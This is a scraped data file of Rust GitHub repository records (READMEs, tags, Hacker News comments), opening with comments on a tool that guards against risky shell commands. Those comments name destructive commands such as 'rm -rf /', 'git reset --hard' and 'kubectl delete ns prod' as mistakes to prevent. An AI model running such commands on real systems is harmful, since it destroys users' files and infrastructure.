regret doing resetting the files, I can just dig through the backup and try to find it.I think there is another use case for a tool like this: predictable auto completion instead of input validation.For example, if you type this:\n`mkdir test && cd test` the tool could realize that the `test` folder was created and offer tab completion for it in the second part. I have long wanted a shell with better auto completion, more prediction etc.I don\u2019t think it may help in a long run, except in cases when you mistyped a command. Mistakes are done because some assumptions are wrong, e.g. wrong cwd, hostname, account, and a captcha-like barrier cannot point that out or make you think about it more. The correct way to prevent mistakes is easy reversibility. Except for very big files/changes we now have an essentially unlimited disk space. Programs should learn to use it to manage undo.One way to do it is to use your shell functions (or aliases) for example for bash: function rm() {\n if [[ \"$@\" =~ \"-rf\" && \"${RISKY}\" != \"1\" ]]; then\n echo \"Confirm by running RISKY=1 rm $@\"\n else\n command rm \"$@\"\n fi\n }\n\nThis goes into ~/.bashrc and I have a lot of commands customized to save time (for example git [1] or docker)[1]: https://gist.github.com/huksley/ef70da85f8dc0c9ca6f8ec4f37c3...Other than rm -rf / (which can happen if you manage to hit enter rather than another key) this feels not terribly useful. Who has accidentally kubectl delete ns prod? Anecdotally, the accidental enter seems like a much more likely scenario (I once ruined a server by chmod -r a+r / ing \u2014 that feels like a better use case for accident protection).Usually when I make these mistakes I\u2019m running the command on purpose, but my context is somehow confused. So I would probably happily solve the challenge and break everything.Do people really issue these risky commands (and regret)? Or is it rather variable substitution which comes to play? E.g. referenced to undeclared variable which renders to empty string.Only because the creator is on here: oops has two O's. Unless you were making a pun with ops in which case maybe remove the elongation so it doesn't seem like a typo.How do I save myself from myself?rm -rf *\ngit reset --hard Before hitting the enter key?\nkubectl delete ns Stop! you are going to delete a lot of resources\nAnd many more!visit here: https://github.com/kaplanelad/shellfirmThis kind of tool needs context awareness to be useful.After the first 30~40 times you\u2019re asked if you want to delete these pods, solving the question coming next becomes automatic. If you\u2019re in a \u201cI\u2019m on my dev env, nothing bad can happen\u201d mindset, that prompt won\u2019t get you out of it, it will just be a tedious step, we\u2019ve seen that time and time again.It becomes a lot more interesting if it can ask \u201cyou\u2019re going to delete from the cluster prod, do you really want to ?\u201d and only do so for production.Same for \u201crm -f\u201d really, if it can confirm before you\u2019re deleting a tree of thousands of file, and not when it\u2019s 3 empty directories you created 3 min ago.It only cover rm mistakes but is so KISSly great : trash-d will alias rm so that all that you rm goes to the bin instead of disappearing for ever :https://github.com/rushsteve1/trash-dEnter - Required only to press Enter to continue.That sounds like it would be a bit too easy to accidentally go through, especially since Enter was used to initiate the command. Hold down the key just a little too long and it'll be as if you weren't even challenged.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ecumene/rust-sloth", "link": "https://github.com/ecumene/rust-sloth", "tags": ["rust", "graphics", "computer-graphics", "graphics-3d", "cli", "cli-app", "hacktoberfest"], "stars": 655, "description": "A 3D software rasterizer... for the terminal!", "lang": "Rust", "repo_lang": "", "readme": "# sloth - A one-of-a-kind Rust 3D Renderer for the CLI\n![pikachu](models/demo/pikachu.gif)\n \nA one-of-a-kind command line 3D software rasterizer made with termion, tobj, and nalgebra. Currently it \nsupports OBJ file formats without textures. It also supports OBJ file formats with vertex colors.\n\n[Javascript Export Demonstration](http://ecumene.xyz/sloth-demo)\n\n## Getting Started / Uses\n---\nHere's a few really simple commands for you to get started.\n\nYou can replace `sloth ` with `cargo run --release -- ` anywhere\n\n#### Render pikachu\n```\nsloth models/Pikachu.obj\n```\n#### For multiple models: \n```\nsloth \"models/suzy.obj models/suzy.obj\"\n```\n#### You can also generate a static image:\n```\nsloth models/Pikachu.obj image -w -h \n```\n#### You can also generate a portable Javascript render like this:\n```\nsloth models/Pikachu.obj image -j -w -h > src-webify/data.js\n```\n\nThank you, contributors!\n---\n[Maxgy](https://github.com/Maxgy) \u2013 Rustfmt lint\n[donbright](https://github.com/donbright) \u2013 STL model loading added, Rustfmt lint\n[jonathandturner](https://github.com/jonathandturner) \u2013 Crossterm port\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sharksforarms/deku", "link": "https://github.com/sharksforarms/deku", "tags": ["rust", "rust-crate", "serialization", "deserialization", "parse", "encoder-decoder", "bits", "bytes", "declarative", "symmetric", "deku"], "stars": 654, "description": "Declarative binary reading and writing: bit-level, symmetric, serialization/deserialization", "lang": "Rust", "repo_lang": "", "readme": "# Deku\n\n[![Latest Version](https://img.shields.io/crates/v/deku.svg)](https://crates.io/crates/deku)\n[![Rust Documentation](https://docs.rs/deku/badge.svg)](https://docs.rs/deku)\n[![Actions Status](https://github.com/sharksforarms/deku/workflows/CI/badge.svg)](https://github.com/sharksforarms/deku/actions)\n[![codecov](https://codecov.io/gh/sharksforarms/deku/branch/master/graph/badge.svg)](https://codecov.io/gh/sharksforarms/deku)\n[![Gitter](https://badges.gitter.im/rust-deku/community.svg)](https://gitter.im/rust-deku/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\nDeclarative binary reading and writing\n\nThis crate provides bit-level, symmetric, serialization/deserialization\nimplementations for structs and enums\n\n## Why use Deku\n\n**Productivity**: Deku will generate symmetric reader/writer functions for your type!\nAvoid the requirement of writing redundant, error-prone parsing and writing code\nfor binary structs or network headers\n\n## Usage\n\n```toml\n[dependencies]\ndeku = \"0.15\"\n```\n\nno_std:\n```toml\n[dependencies]\ndeku = { version = \"0.15\", default-features = false, features = [\"alloc\"] }\n```\n\n## Example\n\nSee [documentation](https://docs.rs/deku) or\n[examples](https://github.com/sharksforarms/deku/tree/master/examples) folder for more!\n\nRead big-endian data into a struct, modify a value, and write it\n\n```rust\nuse deku::prelude::*;\n\n#[derive(Debug, PartialEq, DekuRead, DekuWrite)]\n#[deku(endian = \"big\")]\nstruct DekuTest {\n #[deku(bits = \"4\")]\n field_a: u8,\n #[deku(bits = \"4\")]\n field_b: u8,\n field_c: u16,\n}\n\nfn main() {\n let data: Vec = vec![0b0110_1001, 0xBE, 0xEF];\n let (_rest, mut val) = DekuTest::from_bytes((data.as_ref(), 0)).unwrap();\n assert_eq!(DekuTest {\n field_a: 0b0110,\n field_b: 0b1001,\n field_c: 0xBEEF,\n }, val);\n\n val.field_c = 0xC0FE;\n\n let data_out = val.to_bytes().unwrap();\n assert_eq!(vec![0b0110_1001, 0xC0, 0xFE], data_out);\n}\n```\n\n## Changelog\n\nSee [CHANGELOG.md](https://github.com/sharksforarms/deku/blob/master/CHANGELOG.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MirrorX-Desktop/MirrorX", "link": "https://github.com/MirrorX-Desktop/MirrorX", "tags": ["remote-control", "remote-desktop", "rust", "tauri"], "stars": 653, "description": "Remote control tool for enterprise, teams and individuals. Build fast and security remote control network with fully control in a short time.", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n

\n MirrorX
\n

\n\n

\n \n \n \n

\n\n

\n English\n \u7b80\u4f53\u4e2d\u6587\n

\n\n### **\u5f00\u653e**\n\nMirrorX \u662f\u4e00\u5957\u9762\u5411\u4f01\u4e1a\u3001\u56e2\u961f\u4e0e\u4e2a\u4eba\u7684\u5f00\u6e90\u8fdc\u7a0b\u684c\u9762\u89e3\u51b3\u65b9\u6848\u3002\n\n### **\u5b89\u5168**\n\n\u6240\u6709\u4e1c\u897f\u90fd\u5904\u4e8e\u60a8\u7684\u63a7\u5236\u4e4b\u4e0b\uff0c\u60a8\u8fd8\u53ef\u4ee5\u9009\u62e9\u5728\u672c\u5730\u6216\u4e91\u7aef\u90e8\u7f72\uff0c\u5e76\u4e14\u90fd\u652f\u6301\u7aef\u5230\u7aef\u52a0\u5bc6\u3002\n\n### **\u9ad8\u6027\u80fd**\n\nGPU \u52a0\u901f\u30014K \u5206\u8fa8\u7387\u300160 FPS \u7b49\u7b49\u7279\u6027\uff0c\u8ba9\u4f60\u50cf\u5728\u4f7f\u7528\u672c\u5730\u684c\u9762\u73af\u5883\u4e00\u6837\u3002\n\n\u89c6\u9891\u4e0e\u97f3\u9891\u7684\u7a7f\u900f\u3001\u6587\u4ef6\u4f20\u9001\u3001\u8de8\u5e73\u53f0\u3001\u79fb\u52a8\u8bbe\u5907\u652f\u6301\u7b49\u5fc5\u4e0d\u53ef\u5c11\u7684\u529f\u80fd\u9010\u6b65\u652f\u6301\u4e2d\uff0c\u8fd8\u6709\u66f4\u591a\u5373\u5c06\u5230\u6765\u7684\u529f\u80fd\u8ba9\u4f60\u5927\u5f00\u773c\u754c\u3002\n\n> **Note: MirrorX \u8fd8\u5904\u4e8e\u5f00\u53d1\u7684\u65e9\u671f\u9636\u6bb5, \u8bf7\u6ce8\u610f\u6211\u4eec\u4e0d\u4fdd\u8bc1\u4efb\u4f55\u5411\u540e\u517c\u5bb9\u6027**\n\n## \u7ec4\u4ef6\n\n- [MirrorX Client](https://github.com/MirrorX-Desktop/MirrorX)\n- [MirrorX Portal Server](https://github.com/MirrorX-Desktop/portal)\n- [MirrorX Relay Server](https://github.com/MirrorX-Desktop/relay)\n\n## \u514d\u8d39\u516c\u5171\u670d\u52a1\u5668\n\n> \u8fd9\u53f0\u670d\u52a1\u5668\u662f\u793e\u533a\u8d21\u732e\u7684\uff0c\u6240\u4ee5\u8bf7\u4e0d\u8981\u6ee5\u7528\u5b83\u3002\n\n| \u4f4d\u7f6e | \u914d\u7f6e |\n| :--: | :------------: |\n| \u9996\u5c14 | 1vCPU & 1G RAM |\n\n## \u53ef\u7528\u5e73\u53f0\n\n- [x] macOS\n- [x] Windows\n- [ ] Linux (WIP)\n- [ ] Android (WIP)\n- [ ] iOS (WIP)\n- [ ] Web (WIP)\n\n## \u5982\u4f55\u6784\u5efa\n\n### \u5148\u51b3\u6761\u4ef6\n\n1. \u5df2\u5b89\u88c5 `nodejs && yarn(v3)` \u3002\n2. \u5b89\u88c5 `tauri-cli` \u3002\n\n```console\ncargo install tauri-cli\n```\n\n### \u6b65\u9aa4\n\n1. \u4ece [MirrorX-Desktop/media_libraries_auto_build](https://github.com/MirrorX-Desktop/media_libraries_auto_build) \u4e0b\u8f7d\u9884\u7f16\u8bd1\u7684\u591a\u5a92\u4f53\u5e93\u4ea7\u7269\u3002\n2. \u89e3\u538b\u591a\u5a92\u4f53\u5e93\u4ea7\u7269\u5230\u4efb\u4f55\u4f60\u559c\u6b22\u7684\u8def\u5f84\u3002\n3. **\u5c06\u521a\u624d\u89e3\u538b\u7684\u591a\u5a92\u4f53\u5e93\u4ea7\u7269\u8def\u5f84\u6dfb\u52a0\u5230\u73af\u5883\u53d8\u91cf\u4e2d**\n\n - \u5bf9\u4e8e MacOS\n\n ```console\n $ export MIRRORX_MEDIA_LIBS_PATH=\u4f60\u7684\u4ea7\u7269\u89e3\u538b\u8def\u5f84\n ```\n\n - \u5bf9\u4e8e Windows **(\u4ee5\u7ba1\u7406\u5458\u8eab\u4efd\u8fd0\u884c)**\n ```PowerShell\n PS > [Environment]::SetEnvironmentVariable('MIRRORX_MEDIA_LIBS_PATH', '\u4f60\u7684\u4ea7\u7269\u89e3\u538b\u8def\u5f84' , 'Machine')\n ```\n\n4. \u4ee5 Debug \u6a21\u5f0f\u8fd0\u884c\n\n```console\ncargo tauri dev\n```\n\n## \u5173\u4e8e\u9884\u7f16\u8bd1\u7684\u591a\u5a92\u4f53\u5e93\n\n\u4e3a\u4e86\u52a0\u901f\u7f16\u8bd1\u8fc7\u7a0b\uff0c\u6211\u4eec\u5efa\u7acb\u4e86 [MirrorX-Desktop/media_libraries_auto_build](https://github.com/MirrorX-Desktop/media_libraries_auto_build) \u6765\u81ea\u52a8\u5316\u548c\u900f\u660e\u5316\u6784\u5efa\u8fd9\u4e9b\u4f9d\u8d56\u5e93\u3002\u5305\u62ec [FFmpeg](https://git.ffmpeg.org/ffmpeg.git) \u3001libx264\uff08[Windows](https://github.com/ShiftMediaProject/x264.git), [MacOS](https://code.videolan.org/videolan/x264.git)\uff09\u3001libx265\uff08[Windows](https://github.com/ShiftMediaProject/x265.git), [MacOS](https://bitbucket.org/multicoreware/x265_git.git)\uff09\u3001libopus\uff08[Windows](https://github.com/ShiftMediaProject/opus.git), [MacOS](https://github.com/xiph/opus.git)\uff09 \u548c MFXDispatch\uff08\u53ea\u7528\u4e8e [Windows](https://github.com/ShiftMediaProject/mfx_dispatch.git)\uff09\u3002\u4f60\u53ef\u4ee5\u5728 [MirrorX-Desktop/media_libraries_auto_build](https://github.com/MirrorX-Desktop/media_libraries_auto_build) \u6d4f\u89c8 [\u5de5\u4f5c\u6d41](https://github.com/MirrorX-Desktop/media_libraries_auto_build/tree/main/.github/workflows) \u4ee5\u83b7\u53d6\u66f4\u591a\u7ec6\u8282\u3002\n\n\u5f53\u7136\uff0c\u4f60\u4e5f\u5b8c\u5168\u53ef\u4ee5\u6839\u636e\u6211\u4eec\u7684 [\u5de5\u4f5c\u6d41](https://github.com/MirrorX-Desktop/media_libraries_auto_build/tree/main/.github/workflows) \u6765\u81ea\u884c\u6784\u5efa\u8fd9\u4e9b\u4f9d\u8d56\u5e93\u3002\n\n## \u622a\u56fe\n\n

\n\n\n\n

\n\n## \u611f\u8c22\n\n### \u611f\u8c22\u90a3\u4e9b\u4ee4\u4eba\u60ca\u53f9\u7684\u5f00\u6e90\u9879\u76ee\u4f7f\u5f97 MirrorX \u5f97\u4ee5\u6210\u771f\u3002\n\n\uff08\u6392\u540d\u4e0d\u5206\u5148\u540e\uff0c\u4ec5\u5217\u51fa\u90e8\u5206\u9879\u76ee\uff0c\u611f\u8c22\u6240\u6709\u5728 Cargo.toml \u548c package.json \u4e2d\u4f9d\u8d56\u7684\u5e93\u7684\u4f5c\u8005\uff09\n\n1. [Rust](https://github.com/rust-lang/rust)\n2. [Tokio](https://github.com/tokio-rs/tokio)\n3. [FFMPEG](https://ffmpeg.org)\n4. [serde](https://github.com/serde-rs/serde)\n5. [ring](https://github.com/briansmith/ring)\n6. [egui](https://github.com/emilk/egui)\n7. [windows-rs](https://github.com/microsoft/windows-rs)\n8. [sveltekit](https://github.com/sveltejs/kit)\n9. [daisyUI](https://github.com/saadeghi/daisyui)\n10. [tailwindcss](https://github.com/tailwindlabs/tailwindcss)\n11. [ShiftMediaProject](https://github.com/ShiftMediaProject)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "CSML-by-Clevy/csml-engine", "link": "https://github.com/CSML-by-Clevy/csml-engine", "tags": ["rust", "interpreter", "language", "chatbot", "csml", "programming-language"], "stars": 653, "description": "CSML is an easy-to-use chatbot programming language and framework.", "lang": "Rust", "repo_lang": "", "readme": "\n

\n
\n \"CSML\"\n
\n\n

\n\n

First programming language dedicated to building chatbots.

\n\n

\n \"Rust\"\n \"GitHub\n \"Docker\n \"Slack\" \n

\n\n

\n Key Features \u2022\n Example \u2022\n Getting started \u2022\n Additional Information\n

\n

\n Try CSML online\n

\n\n

\n \"CSML-demo\"\n

\n\n[CSML (Conversational Standard Meta Language)](https://csml.dev) is both a domain-specific programming language and chatbot engine, designed to make it easy to develop complex chatbots.\n\nWith a very expressive and text-only syntax, CSML flows are easy to understand, making it easy to deploy and maintain conversational agents. CSML handles short and long-term memory slots, metadata injection, and connecting to any third party API or injecting arbitrary code in any programming language thanks to its powerful runtime APIs.\n\n## Key Features\n\n* Text-only, expressive syntax, easy to learn and develop complex chatbot scenarios with\n* Rich and extensible conversational components such as Carousel, Image, Video, Button, Card, Input, Calendar...\n* Built-in short-term and long-term memory slots: no more complex state machine boilerplate\n* Portable, fast, and easy to deploy: it only requires a standard MongoDB, PostgreSQL or SQLite database\n* Vibrant community of over 20,000 active CSML developers\n\n## Example\n\n```cpp\nstart:\n say \"Hi, nice to meet you, I'm a demo bot \ud83d\udc4b\"\n if (name) {\n say \"I already know you \ud83d\ude09\"\n goto known\n }\n else \n goto name\n\nname:\n say Question(\n \"I'd like to know you better, what's your name?\",\n buttons=[\n Button(\"I'm anonymous \ud83d\ude0e\", accepts=[\"No\", \"Nope\"]) as anonBtn\n ],\n )\n hold\n if (event.match(anonBtn)) {\n remember name = \"anon\"\n } else {\n remember name = event\n }\n goto known\n\nknown:\n if (name == \"anon\")\n say \"...but I know you don't want to say too much about yourself!\"\n else \n say \"You are {{name}}!\"\n goto end\n```\n\nThe full documentation is available on https://docs.csml.dev/language.\n\n# Getting Started\n\nThe simplest way to get started with CSML is to use CSML Studio, a free online development environment with everything already setup to start creating bots right away, directly in your browser.\n\nTo get started with CSML Studio: https://studio.csml.dev\n\nCSML Studio gives you a free playground to experiment with the language as well as options to deploy your chatbots at scale in one-click.\n\n## Self-hosted / cloud / local installation\n\nCSML is available as a self-hostable web server that you can easily install with one of the options below.\n\nNote that you will need a database. The default choice is **MongoDB**, but **Amazon DynamoDB**, **PostgreSQL** and **SQLite**\nare also available by choosing the `mongodb`, `dynamodb`, `postgresql` or `sqlite` engine DB type with a slightly different set of environment variables.\n\nBefore you start, make sure that you have the environment set with following options:\n\n```\nENGINE_DB_TYPE=mongodb # must be one of mongodb|dynamodb|postgresql|sqlite\n\n# for mongodb\nMONGODB_URI=mongodb://username:password@localhost:27017\nMONGODB_DATABASE=csml\n\n# for postgresql\nPOSTGRESQL_URL=postgres://user:password@hostname:port/database\n\n# for sqlite\nSQLITE_URL=csml.db\n\n# for dynamodb (requires S3 for storage of large items)\nAWS_ACCESS_KEY_ID= # or use a local IAM role\nAWS_SECRET_ACCESS_KEY= # or use a local IAM role\nAWS_REGION=\nAWS_DYNAMODB_ENDPOINT= # optional, defaults to the dynamodb endpoint for the given region.\nAWS_DYNAMODB_TABLE=\nAWS_S3_ENDPOINT= # optional, defaults to the S3 endpoint for the given region\nAWS_S3_BUCKET=\n\n# CSML Server configuration\nENGINE_SERVER_PORT=5000\nENGINE_SERVER_API_KEYS=someAuthKey4CsmlServer,someOtherAuthKey\n\n# Other optional engine configuration\nENGINE_ENCRYPTION_SECRET=some-secret-string # if not set, data will not be stored encrypted\nTTL_DURATION=30 # auto-remove chatbot user data after X days\nLOW_DATA_MODE=true # do not store contents of sent/received messages\nDISABLE_SSL_VERIFY=false # reach trusted endpoints with known invalid certificates\nDEBUG=true # print debug output in console\nCSML_LOG_LEVEL=error # print log output in stderr. Possible values are error, warn, info, debug, trace.\nMODULES_URL= # default module repository base url\nMODULES_AUTH= # default module auth token\n```\n\n### Deploy to Heroku\n\n\n \"Deploy\n\n\n### Using a ready-to-use binary (Linux and MacOS only)\n\nThe easiest way to launch a CSML Engine on your own machine is to use one of our pre-built, optimized binaries (available for both MongoDB and Amazon DynamoDB). These binaries are available as executables on each of CSML's releases since v1.3.0.\n\nFollow the installation guide (for ubuntu, but the process will be similar on other operating systems) along on this blog post: https://blog.csml.dev/how-to-install-a-self-hosted-csml-engine-on-ubuntu-18-04/\n\nTo download the latest CSML Server binaries, [head over to the latest release](https://github.com/CSML-by-Clevy/csml-engine/releases/latest) and make sure to download the right version for your architecture.\n\n**Mac users**: upon first execution of this binary, Mac will probably open a warning about the application not being signed ([more info from Apple](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution)). As this is not intended as a widely-distributed application, we decided to not go through the notarization process for now, but you can safely ignore that warning! However, if you prefer, you can always [build this package from source](#with-rust-from-source).\n\n### With Docker\n\nWe provide a docker image for easy self-hosted usage.\n\n```\ndocker pull clevy/csml-engine\n```\n\nTo get started with CSML Engine on Docker: https://github.com/CSML-by-Clevy/csml-engine-docker\n\n### With Rust, from source\n\nCSML is built in [Rust](https://www.rust-lang.org/). You don't need to know any Rust to run it though! Make sure you are running Rust v1.46+ and that you have openssl installed on your machine (or an equivalent for your linux distribution, such as libssl), then run:\n\n```\ncd csml_server\n\n# for use with MongoDB\ncargo build --release --features csml_engine/mongo\n\n# for use with Amazon DynamoDB\ncargo build --release --features csml_engine/dynamo\n```\n\nAfter that, execute your build (by default under ./targets/release/csml_server) and visit http://localhost:5000 for some request examples.\n\n### With Node.js\n\nThis repository provides Node.js bindings of this rust library. To use this library in a Node.js project, you will need to build it from source. There are a few requirements:\n\n- Current Rust Stable version (v1.61.0 and above)\n- Node.js LTS\n- cargo-cp-artifact v0.1.6 [required dependencies](https://www.npmjs.com/package/cargo-cp-artifact)\n- libssl-dev (or equivalent for your architecture: openssl-dev, libssl-devel...)\n\nTo compile CSML Engine into a [native node module](https://Node.js.org/api/addons.html), run:\n\n```shell\ngit clone https://github.com/CSML-by-Clevy/csml-engine csml\ncd csml/bindings/node/native\nnpm run build -- --release\n```\n\n> NB: you can build specifically for MongoDB, DynamoDB, SQLite or PostgreSQL by using one of the specialized scripts (i.e `npm run build:mongodb`) in the [package.json](./bindings/node/native/package.json).\n\nThis method will output this native file: `csml/bindings/node/native/index.node` that you can simply `require()` (or `import`) in your project. For more details about how to use this module in your own projects, you can have a look at [our implementation for Docker version](https://github.com/CSML-by-Clevy/csml-engine-docker/blob/master/app/server.js).\n\nPlease note that if you plan to deploy your project on a different architecture, you will need to recompile the project on that architecture. We recommend using git submodules if you need to integrate CSML Engine in your own Node.js projects.\n\n## REST API documentation\n\nCSML Server's HTTP REST API documentation is available in OpenAPIv3 format: [swagger.yaml](./csml_server/swagger.yaml). To read this file easily, you can open it in [Swagger Editor](https://editor.swagger.io).\n\n## Additional Information\n\n### Play with the language\n\n* [Studio] - Create and deploy your chatbot in a matter of minutes.\n* [Playground] - Test and learn CSML in your browser.\n\n[Studio]: https://studio.csml.dev\n[Playground]: https://play.csml.dev\n\n### Getting Help\n\n* [Slack] - The official CSML community.\n* [CSML Documentation](https://docs.csml.dev) - Getting started.\n\n[Slack]: https://csml-by-clevy.slack.com/join/shared_invite/enQtODAxMzY2MDQ4Mjk0LWZjOTZlODI0YTMxZTg4ZGIwZDEzYTRlYmU1NmZjYWM2MjAwZTU5MmU2NDdhNmU2N2Q5ZTU2ZTcxZDYzNTBhNTc\n\n### Information\n\n* [Release notes](https://updates.csml.dev/) - Stay up to date.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "altdesktop/i3-style", "link": "https://github.com/altdesktop/i3-style", "tags": ["i3", "i3wm", "sway", "swaywm"], "stars": 652, "description": "\ud83c\udfa8 Make your i3 config a little more stylish.", "lang": "Rust", "repo_lang": "", "readme": "# i3-style\n\nMake your [i3](http://i3wm.org) config a little more stylish.\n\n## About\n\n`i3-style` applies a theme to your i3 config file to change the colorscheme of the window decorations and the different parts of i3bar. It's designed especially for people who make frequent changes to their colorscheme to get things just right.\n\n* Easy to try out new themes right after you install.\n* Themes are easy to read, modify, and share.\n* Modifies your theme in place - extra template files are not needed.\n\n[Chat](https://discord.gg/UdbXHVX)\n\n## Installing\n\nIf you have a Rust toolchain available, you can install with Cargo:\n\n cargo install i3-style\n\nOtherwise, check the [releases](https://github.com/acrisci/i3-style/releases) page where I post precompiled binaries.\n\n## Usage\n\nJust call `i3-style` with the name of the theme you want to try and where you want to write the config file to. i3-style will look for your config in the default place and apply the theme.\n\n i3-style solarized -o ~/.config/i3/config --reload\n\nCheck the `themes` directory for the list of built-in themes.\n\n i3-style ~/.config/i3/solarized.yaml -o ~/.config/i3/config\n\nJust keep doing that until you get it perfect (which might be never).\n\n## Send us themes!\n\nDo you have a cool colorscheme in your config file that you want to share with other people? i3-style can automatically convert it to a theme file:\n\n i3-style --to-theme ~/.config/i3/config -o my-theme.yaml\n\nIf you have a new theme, or made an improvement to an existing theme, please make a pull request adding your theme to the `themes` directory!\n\n## License\n\nThis work is available under a FreeBSD License (see LICENSE).\n\nCopyright \u00a9 2013, Tony Crisci\n\nAll rights reserved.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "oconnor663/duct.rs", "link": "https://github.com/oconnor663/duct.rs", "tags": [], "stars": 651, "description": "a Rust library for running child processes", "lang": "Rust", "repo_lang": "", "readme": "# {{crate}}.rs [![Actions Status](https://github.com/oconnor663/duct.rs/workflows/tests/badge.svg)](https://github.com/oconnor663/duct.rs/actions) [![crates.io](https://img.shields.io/crates/v/duct.svg)](https://crates.io/crates/duct) [![docs.rs](https://docs.rs/duct/badge.svg)](https://docs.rs/duct)\n\n{{readme}}\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "akeru-inc/xcnotary", "link": "https://github.com/akeru-inc/xcnotary", "tags": ["macos", "osx", "catalina", "notarization", "swift", "objc", "objectivec", "rust"], "stars": 650, "description": "the missing macOS app notarization helper, built with Rust", "lang": "Rust", "repo_lang": "", "readme": "# `xcnotary` is no longer needed!\n\nUse `xcrun notarytool --wait` as described in Apple's docs: [Customizing the notarization workflow](https://developer.apple.com/documentation/security/notarizing_macos_software_before_distribution/customizing_the_notarization_workflow#3087734)\n\nWith a concise example given here: https://github.com/akeru-inc/xcnotary/issues/22#issuecomment-1179170957\n\n\n\n---\n\n\n\n\n![logo](/docs/images/logo.png)\n\n### ~~the missing macOS app notarization helper, built with Rust~~\n\n# About\n\n[Notarizing a macOS app](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution) involves a series of manual steps, including zipping a bundle, uploading it to to Apple, and polling the notarization service.\n\n`xcnotary` automates these steps for you. It:\n\n- Attempts to fail fast if necessary, performing several checks on your target before uploading it to Apple.\n- Zips the input if it is an .app bundle.\n- Submits the input to the notarization service, and polls until completion. This step typically takes a few minutes.\n- In case of success, attaches the notarization ticket to the target, enabling the app to pass Gatekeeper on first run even without an Internet connection.\n- In case of failure, fetches the error log from Apple and outputs it to `stderr`.\n- Return a zero/non-zero code for easy CI integration.\n\n![Notarization](/docs/images/notarize.png)\n\n# Installation\n\n### Homebrew\n\n```sh\n# Install\nbrew install akeru-inc/tap/xcnotary\n\n# Upgrade\nbrew update\nbrew upgrade akeru-inc/tap/xcnotary\n```\n\n# Usage\n\nTo perform various code signing checks on the input without submitting:\n\n```sh\nxcnotary precheck \n```\n\nTo perform code signing checks, submit to the notarization service, and block waiting for response:\n\n```sh\nxcnotary notarize \\\n --developer-account \\\n --developer-password-keychain-item \\\n [--provider ]\n [--no-precheck]\n```\n\nSupported inputs:\n\n- \u2705 .app bundles\n- \u2705 .dmg disk images\n- \u2705 .pkg installer packages\n\n### Specifying the password keychain item\n\nThis tool does not handle your Apple Developer password. Instead, Xcode's helper `altool` reads an app-specific Apple Developer ID password directly from the keychain. See [the documentation](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution/customizing_the_notarization_workflow#3087734) for `xcrun altool --store-password-in-keychain-item` to set up a suitable keychain item.\n\n### Specifying the developer team\n\nThe optional `--provider` argument should be specified if the developer account is associated with more than one team. This value can be obtained by running the following command and noting the \"ProviderShortname\" displayed.\n\n```sh\nxcrun altool --list-providers -u \"$DEVELOPER_ACCOUNT_USERNAME\" -p \"@keychain:$PASSWORD_KEYCHAIN_ITEM\"\n```\n\n### Required network access\n\n- Xcode's `altool` will connect to several Apple hosts as outlined in [the documentation](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution/customizing_the_notarization_workflow).\n\n- When notarization fails, `xcnotary` will connect to `https://osxapps-ssl.itunes.apple.com/` on port 443 to retrieve the failure log.\n\n### Service response\n\nApple [documentation](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution/customizing_the_notarization_workflow) advises: \"Always check the log file, even if notarization succeeds, because it might contain warnings that you can fix prior to your next submission.\"\n\n`xcnotary` will fetch and display the notarization service response upon completion.\n\n\n# Bundle pre-checks\n\n`xcnotary` attempts to check the input for some [common notarization issues](https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution/resolving_common_notarization_issues) before uploading it to Apple. While not foolproof, these checks may potentially save you minutes waiting for a response only to fail due to an incorrect code signing flag.\n\n![Bundle pre-check](/docs/images/precheck.png)\n\nWhen the input is an app bundle, the following checks will be performed:\n\n- \u2705 Bundle being signed with a Developer ID certificate and not containing unsigned items.\n- \u2705 Bundle being signed with a secure timestamp.\n- \u2705 Bundle *not* having the get-task-allow entitlement.\n- \u2705 Bundle having hardened runtime enabled.\n\nWhen the input is a *.dmg* or a *.pkg*, only the Developer ID signing check is performed, i.e. the only check that can be performed at the moment without extracting the contents. In your workflow, you may want to run `xcnotary precheck` on your bundle target before packaging it.\n\nIn rare cases, it may be helpful to troubleshoot code signing issues directly using the notarization service response. To do so, specify `--no-precheck` when invoking `xcnotary notarize`.\n\n# Building for notarization\n\nThe following examples set various necessary build flags, such as code signing with a \"secure timestamp.\"\n\n### Bundles\n\n```sh\nxcodebuild \\\n -target \\\n -scheme \\\n -configuration Release \\\n -derivedDataPath .xcodebuild \\\n \"CODE_SIGN_IDENTITY=Developer ID Application: \" \\\n \"OTHER_CODE_SIGN_FLAGS=--timestamp --options=runtime\" \\\n CODE_SIGN_INJECT_BASE_ENTITLEMENTS=NO \\\n CODE_SIGN_STYLE=Manual\n```\n\n`CODE_SIGN_IDENTITY` should match the corresponding Keychain certificate.\n\nNote that `--options=runtime` will have the effect of opting in your binary to the hardened runtime environment. You most likely want to first manually enable the \"Hardened Runtime\" capability in Xcode's target settings > \"Signing and Capabilities\" and make sure your application functions as expected. There, you may also add any entitlements to relax the runtime restrictions.\n\n### Packages\n\n```sh\npkgbuild \\\n --component \n --sign \"Developer ID Installer: \" \\\n --timestamp \\\n \n```\n\n### Disk images\n\nCodesign after creating the DMG:\n\n```sh\ncodesign -s \"Developer ID Application: \" \n```\n\n# Additional Information\n\n- [Change Log](CHANGELOG.md)\n\n- Feature requests/comments/questions? Write: david@akeru.com\n", "readme_type": "markdown", "hn_comments": "I love this. Amazing work \u2014 thanks for making this process easier.Neat! I was just about to need something like this, for building native app bundles for 